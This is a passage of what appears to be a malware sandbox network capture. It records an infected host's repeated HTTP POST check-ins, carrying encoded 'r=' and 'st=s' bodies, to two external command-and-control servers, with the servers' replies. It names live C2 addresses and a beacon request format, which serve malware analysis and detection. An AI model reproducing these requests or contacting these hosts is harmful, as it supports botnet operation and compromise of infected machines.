                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1409192.168.2.551264193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:26.843945026 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.096658945 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1410192.168.2.551265193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.021985054 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.273685932 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1411192.168.2.551266193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.433020115 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.680918932 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1412192.168.2.551267193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.604831934 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.854819059 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1413192.168.2.551268193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:27.932941914 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.187618017 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1414192.168.2.551269193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.098064899 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.340475082 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1415192.168.2.551270193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.518508911 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.757797003 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1416192.168.2.551271193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.682579041 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:28.931243896 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1417192.168.2.551272193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.014595032 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.271383047 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1418192.168.2.551273193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.178479910 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.426361084 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1419192.168.2.551274193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.615556955 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.859255075 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1420192.168.2.551275193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:29.761034012 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.010283947 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1421192.168.2.551276193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.106158018 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.354044914 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1422192.168.2.551277193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.261141062 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.512808084 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1423192.168.2.551278193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.701637983 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.952784061 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1424192.168.2.551279193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:30.844021082 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:31.092019081 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1425192.168.2.551280193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:31.207171917 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:31.462263107 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
